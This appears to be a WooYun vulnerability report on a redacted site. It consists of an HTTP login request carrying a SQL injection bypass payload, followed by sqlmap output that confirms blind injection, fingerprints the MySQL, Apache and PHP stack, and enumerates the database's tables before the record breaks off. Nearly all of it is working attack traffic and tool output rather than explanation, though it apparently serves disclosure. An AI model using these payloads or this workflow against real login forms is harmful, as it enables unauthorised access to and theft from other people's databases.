WooYun.org

POST /manager/login.php HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/manager/index.htm
Cookie: PHPSESSID=dd7u5oltn870aggjpbpo1fden4
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
loginid=%27or%271%27%3D%271&password=%27or%271%27%3D%271

Place: POST
Parameter: loginid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: loginid='or'1'%3D'1' AND 3567=3567 AND 'YDSI'='YDSI&password='or'1'
%3D'1
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: loginid='or'1'%3D'1' AND SLEEP(5) AND 'ZNVy'='ZNVy&password='or'1'%
3D'1
---
[20:29:25] [INFO] testing MySQL
[20:29:25] [INFO] confirming MySQL
[20:29:29] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.0.55, PHP 5.3.4
back-end DBMS: MySQL >= 5.0.0
[20:29:29] [INFO] fetching current database
[20:29:29] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[20:29:29] [INFO] retrieved:
[20:29:39] [INFO] heuristics detected web page charset 'GB2312'
dt
current database:    'dt'
[20:30:26] [INFO] fetched data logged to text files under 'C:\Python27\sqlmappro
ject-sqlmap-b5060c0\output\**.**.**.**'

Place: POST
Parameter: loginid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: loginid='or'1'%3D'1' AND 3567=3567 AND 'YDSI'='YDSI&password='or'1'
%3D'1
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: loginid='or'1'%3D'1' AND SLEEP(5) AND 'ZNVy'='ZNVy&password='or'1'%
3D'1
---
[20:31:41] [INFO] testing MySQL
[20:31:41] [INFO] confirming MySQL
[20:31:46] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.0.55, PHP 5.3.4
back-end DBMS: MySQL >= 5.0.0
[20:31:46] [INFO] fetching tables for database: 'dt'
[20:31:46] [INFO] fetching number of tables for database 'dt'
[20:31:46] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[20:31:46] [INFO] retrieved:
[20:31:49] [INFO] heuristics detected web page charset 'GB2312'
63
[20:32:03] [INFO] retrieved: book
[20:33:45] [INFO] retrieved: bookt
[20:35:04] [CRITICAL] unable to connect to the target url or proxy. sqlmap is go
ing to retry the request
icket
[20:36:19] [INFO] retrieved: hxadlist
[20:39:21] [INFO] retrieved: hxchengji
[20:41:47] [INFO] retrieved: hxdownload
[20:44:17] [INFO] retrieved: hx
[20:44:50] [CRITICAL] unable to connect to the target url or proxy. sqlmap is go
ing to retry the request
gaoji
[20:46:31] [CRITICAL] unable to connect to the target url or proxy. sqlmap is go
ing to retry the request
an
[20:47:11] [INFO] retrieved:
[20:47:32] [CRITICAL] unable to connect to the target url or proxy. sqlmap is go
ing to retry the request
hxgaojian_copy
[20:49:42] [INFO] retrieved: hxgroup
[20:51:44] [INFO] retrieved: hxinfo
[20:53:07] [INFO] retrieved: hxinfo_bao
[20:54:38] [INFO] retrieved: hxinfo_cop
[20:56:12] [CRITICAL] unable to connect to the target url or proxy. sqlmap is go
ing to retry the request
y
[20:56:37] [INFO] retrieved: hxlink
[20:58:19] [INFO] retrieved: hxluyong
[21:00:07] [INFO] retrieved: hxme
[21:01:11] [CRITICAL] unable to connect to the target url or proxy. sqlmap is go
ing to retry the request
nu
[21:01:47] [INFO] retrieved: hxpeoplework
[21:04:46] [INFO] retrieved: hxproduct
[21:07:01] [INFO] retrieved: hxreadover
[21:09:43] [INFO] retrieved: hxro